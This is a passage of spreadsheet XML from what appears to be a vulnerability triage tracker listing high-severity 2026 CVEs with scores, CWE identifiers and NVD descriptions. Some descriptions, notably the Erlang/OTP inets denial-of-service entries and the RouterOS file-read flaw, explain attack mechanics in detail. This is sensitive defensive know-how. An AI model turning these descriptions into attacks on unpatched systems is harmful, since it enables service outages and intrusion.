      <c r="S426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62650</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr"/>
      <c r="Q427" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Server-side authorization checks in the web-based management interface are not properly enforced, allowing role-based access control (RBAC) restrictions to be bypassed through manipulation of request data. This could allow an authenticated, low-privileged remote attacker to escalate privileges to an administrative level.</t>
        </is>
      </c>
      <c r="S427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63312</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M428" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr"/>
      <c r="P428" s="5" t="inlineStr"/>
      <c r="Q428" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66840</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr"/>
      <c r="Q429" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains an Exposure of Sensitive System Information to an Unauthorized Control Sphere (CWE-497). Sensitive system information may be leaked.</t>
        </is>
      </c>
      <c r="S429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66840</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67281</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr"/>
      <c r="Q430" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-824</t>
        </is>
      </c>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>RouterOS WebFig contains an unauthenticated file-read vulnerability in the /jsproxy path where a newly allocated session retains a stale uninitialized principal pointer used for file authorization. An unauthenticated attacker can prepare the allocator so that the file-serving path dereferences this pointer with sufficient rights, then supply parent-directory components in an encrypted URI to escape the WebFig file namespace and disclose root-owned files, including configuration stores containing credentials.This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67281</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69664</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr"/>
      <c r="Q431" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>Missing Release of Resource after Effective Lifetime vulnerability in Erlang/OTP inets httpd allows an unauthenticated remote attacker to cause denial of service by sending a request with a chunked body whose chunk-size line is not a hexadecimal number. The worker serving the connection is never released and no timeout reclaims it, so repeating the request across connections occupies every available worker and denies service to legitimate clients. No authentication is required and the default configuration is affected.
The chunk-size line must arrive in a write separate from the headers. When the body accompanies the headers, httpd_request_handler:handle_body/3 calls http_chunk:decode/3 inside a try ... catch throw:Error, so the {error, {chunk_size, _}} thrown by http_chunk:decode_size/4 is answered with 400 Bad Request. When the chunk size arrives later, the decoder is resumed through a bare catch in httpd_request_handler:handle_info/2, which converts the throw into a return value rather than raising it; the resulting error tuple is then treated as the next decoder continuation, the socket is re-armed, and the worker waits for data that never comes. The request timeout has already been cancelled at the point the headers were accepted, and the periodic byte-rate check is only armed when minimum_bytes_per_second is configured, which it is not by default.
This issue affects OTP from OTP 18.1.4 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to inets from 6.0.3 before 9.3.2.7, from 9.4 before 9.6.2.3, and from 9.7 before 9.7.2.</t>
        </is>
      </c>
      <c r="S431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69664</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70399</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr"/>
      <c r="Q432" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in Erlang/OTP inets httpd allows an unauthenticated remote attacker to cause denial of service by opening and holding open a large number of connections. The max_clients option is documented to default to 150, and the inets hardening guide presents that limit as the first layer of denial-of-service defence, but a server that does not set it explicitly accepts an unlimited number of simultaneous connections. Establishing the connections is sufficient; no valid request and no authentication are required.
The accept gate in httpd_manager:handle_new_connection/4 reads the option with httpd_util:lookup/2, which returns undefined when the key is absent, rather than the three-argument form carrying the 150 default that the neighbouring get_ustate/2 uses. Erlang term ordering places every integer before every atom, so the Count =&lt; Max guard holds for any connection count and the server never returns {reject, busy}. Each accepted connection occupies a worker process and a socket for as long as it is held, driving the node towards process, memory and file descriptor exhaustion. Servers that set max_clients explicitly are unaffected, because a configured value is applied as intended.
This issue affects OTP from OTP 17.0 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to inets from 5.10 before 9.3.2.7, from 9.4 before 9.6.2.3, and from 9.7 before 9.7.2.</t>
        </is>
      </c>
      <c r="S432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70399</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71380</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr"/>
      <c r="Q433" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>Missing Release of Resource after Effective Lifetime vulnerability in Erlang/OTP inets httpd allows an unauthenticated remote attacker to cause denial of service by sending valid request headers with a large Content-Length and then stalling before the body is complete.
httpd_request_handler:handle_info/2 cancels the request timeout as soon as a parse step succeeds, which includes the headers, and the clause that handles a decoder asking for more data re-arms the socket with {active, once} without setting any further timer. httpd_request:whole_body/2 returns such a continuation whenever the bytes received are fewer than the announced Content-Length, so a well-formed request that stops mid-body leaves the worker waiting indefinitely. The periodic byte-rate check that would reclaim it is armed only when minimum_bytes_per_second is configured, which it is not by default. Repeating this across connections occupies every worker permitted by max_clients and denies service to legitimate clients at negligible bandwidth cost.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433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71380</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71404</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr"/>
      <c r="Q434" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Rancher Manager. The GlobalRole controller derived the target ClusterRole name from the user-settable `authz.management.cattle.io/cr-name` annotation and overwrote that object's rules without verifying ownership. A user with delegated GlobalRole create or update permission could point the annotation at any existing ClusterRole, such as `cluster-admin`, and revoke the permissions of every principal bound to it. The change persists after the malicious GlobalRole is deleted.
This issue affects Rancher: before 2.15.1.</t>
        </is>
      </c>
      <c r="S434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71404</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71981</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr"/>
      <c r="Q435" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>Cypht before 2.12.2 contains a PHP object injection vulnerability that allows authenticated attackers to execute arbitrary operating system commands by supplying a crafted PHP object graph in the back_query GET parameter of the logout handler. Attackers can pass a base64-encoded serialized payload through this parameter, which is decoded and passed directly to unserialize() without an allow-list, signature check, or type restriction, enabling gadget-chain exploitation to achieve remote code execution as the web server process.</t>
        </is>
      </c>
      <c r="S435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71981</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73314</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr"/>
      <c r="Q436" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a signature verification logic error in the PayPal REST webhook handler that allows unauthenticated attackers to bypass payment signature validation by submitting a webhook request with an unsupported auth_algo header value. When the algorithm cannot be mapped to a supported hash function, the verification function incorrectly returns true instead of failing, causing the caller to treat the fabricated request as verified and process the payment event without a valid PayPal signature.</t>
        </is>
      </c>
      <c r="S436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73316</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr"/>
      <c r="Q437" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a payment replay vulnerability in the PayPal REST payment provider that allows attackers to process the same webhook payload multiple times by exploiting a missing duplicate transaction ID check. Attackers can replay a valid webhook payload to trigger duplicate payment events, resulting in repeated subscription activations and unauthorized account upgrades.</t>
        </is>
      </c>
      <c r="S437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74835</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>The inets application HTTP server httpd fails to enforce a configured body-size limit on chunked request.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438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74835</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75124</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains a pre-authentication memory corruption vulnerability in the web management interface where the _readHttpParam function copies an oversized HTTP query string without guaranteeing NUL termination, allowing parse_query_string to process attacker-controlled data into a fixed-size stack buffer. An unauthenticated remote attacker can send an oversized GET request to dispatcher.cgi to cause denial of service of the web management interface and potentially trigger memory corruption.</t>
        </is>
      </c>
      <c r="S439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75124</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75133</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr"/>
      <c r="Q440" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R440"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S440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75133</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75813</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr"/>
      <c r="Q441" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>Certain configuration endpoints may lack proper server-side 
authorization checks, allowing unauthorized users to access or modify 
sensitive device settings. This could result in full compromise of 
device functionality.</t>
        </is>
      </c>
      <c r="S441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75813</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75960</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr"/>
      <c r="Q442" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R442" s="5" t="inlineStr">
        <is>
